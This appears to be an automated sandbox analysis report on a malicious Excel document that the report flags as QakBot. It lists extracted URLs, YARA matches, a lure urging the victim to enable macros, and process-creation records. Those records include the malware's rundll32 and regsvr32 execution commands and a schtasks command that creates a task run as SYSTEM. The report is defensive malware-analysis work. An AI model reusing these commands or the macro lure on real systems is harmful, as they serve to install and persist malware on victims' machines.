Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://login.windows.local
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://management.azure.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://management.azure.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://tasks.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: QakBot Payload Author: kevoreilly
Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot Payload Author: kevoreilly
Source: 5.2.explorer.exe.ec0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 1.3.rundll32.exe.49f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 5.2.explorer.exe.ec0000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly
Source: 1.3.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot Payload Author: kevoreilly

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 from the yellow bar above RunDLL X 12 13_ Once You have Enable Editing, pIe'
Source: Screenshot number: 8	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Source: Document image extraction number: 5	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5	Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14	Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: 9659e9a8_by_Libranalysis.xls	Initial sample: CALL
Source: 9659e9a8_by_Libranalysis.xls	Initial sample: CALL
Source: 9659e9a8_by_Libranalysis.xls	Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: 9659e9a8_by_Libranalysis.xls

Initial sample: Sheet size: 14902

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\ritofm.cvm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm			Jump to dropped file

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBG

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105822A	1_2_0105822A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057050	1_2_01057050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105538D	1_2_0105538D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_010587CD	1_2_010587CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01053000	1_2_01053000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01054910	1_2_01054910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01055223	1_2_01055223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057A3B	1_2_01057A3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01056743	1_2_01056743
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01053943	1_2_01053943
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01058B55	1_2_01058B55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0105565A	1_2_0105565A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01054F63	1_2_01054F63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01057F75	1_2_01057F75
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01053271	1_2_01053271
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01059571	1_2_01059571
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01059A7C	1_2_01059A7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_010555AE	1_2_010555AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_010535CD	1_2_010535CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01054CCB	1_2_01054CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_010568D7	1_2_010568D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_010598ED	1_2_010598ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01056BEE	1_2_01056BEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_01058DF9	1_2_01058DF9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ECBCF0	5_2_00ECBCF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED54C8	5_2_00ED54C8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED88CA	5_2_00ED88CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EDD0AF	5_2_00EDD0AF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EC704E	5_2_00EC704E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED5422	5_2_00ED5422
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EC69ED	5_2_00EC69ED
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED91C0	5_2_00ED91C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED85D0	5_2_00ED85D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ECC590	5_2_00ECC590
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED3AA2	5_2_00ED3AA2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EC7295	5_2_00EC7295
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED2A55	5_2_00ED2A55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED7A02	5_2_00ED7A02
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EDCE1C	5_2_00EDCE1C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EDF615	5_2_00EDF615
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EC77E7	5_2_00EC77E7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00ED5B9C	5_2_00ED5B9C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 5_2_00EC6F2A	5_2_00EC6F2A

Source: 9659e9a8_by_Libranalysis.xls

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652

Source: ritofm.cvm.5.dr

Static PE information: No import functions for PE file found

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 5.2.explorer.exe.ec0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 1.3.rundll32.exe.49f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 5.2.explorer.exe.ec0000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 1.3.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE	Matched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload

Source: classification engine

Classification label: mal100.expl.evad.winXLS@18/18@2/2

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 5_2_00ED6E91 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,BitBlt,SysAllocString,CoSetProxyBlanket,

5_2_00ED6E91

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F2216F8D-EF73-42B8-8E37-A58300A73E42}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_01
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{D936A919-3D95-457D-8424-47B43B8FC3B5}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5132
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\WERReportingForProcess4780
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D936A919-3D95-457D-8424-47B43B8FC3B5}

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{71F94E0F-2F67-4E94-BECF-B06A373927A8} - OProcSessId.dat

Jump to behavior

Source: 9659e9a8_by_Libranalysis.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: ole32.pdb& source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdbB source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
